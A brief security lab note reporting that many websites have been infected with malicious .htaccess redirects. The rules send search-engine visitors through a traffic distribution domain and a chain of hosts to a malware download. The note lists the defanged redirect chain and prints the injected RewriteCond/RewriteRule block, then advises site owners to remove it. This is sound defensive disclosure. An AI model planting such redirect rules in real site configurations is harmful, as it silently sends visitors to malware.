Secondtds.mooo[.]com .htaccess redirects

Labs Note

We are finding many sites infected with malicious redirects inside the .htaccess file, to secondtds.mooo[.]com/go.php?sid=3. That domain is a TDS (traffic controller) which redirects visitors to another website pushing your browser to download this malware: https://www.virustotal.com/en/file/0b6eab15961f92da95a0a4b0d55fee8a8bd0eb39fec1027aa43575802d7a199e/analysis/1441223870/

The redirect chain is:

secondtds.mooo[.]com
downserver.ignorelist[.]com
pastdownload[.]com
stds1new.computersoftwarelive[.]com
download.pastdownload[.]com
files.september-master-3[.]xyz

Here is the .htaccess content:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} go.mail.* [OR]
RewriteCond %{HTTP_REFERER}  .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER}  .*bing.* [OR]
RewriteCond %{HTTP_REFERER}  .*goto.* [OR]
RewriteCond %{HTTP_REFERER}  .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER}  .*nigma.* [OR]
RewriteCond %{HTTP_REFERER}  .*mamma.* [OR]
..
RewriteCond %{HTTP_REFERER}  .*aport.* [OR]
RewriteCond %{HTTP_REFERER}  .*search.* [OR]
RewriteCond %{HTTP_REFERER}  .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER}  .*dogpile.*
RewriteRule ^(.*)$ http://secondtds[.]mooo.com[/]go.php?sid=2 [R=301,L]

The attack is quite buggy and doesn’t check whether a site is already infected, thus multiple identical redirect rules in the same .htaccess file.

If you find this code, remove it right away!

You May Also Like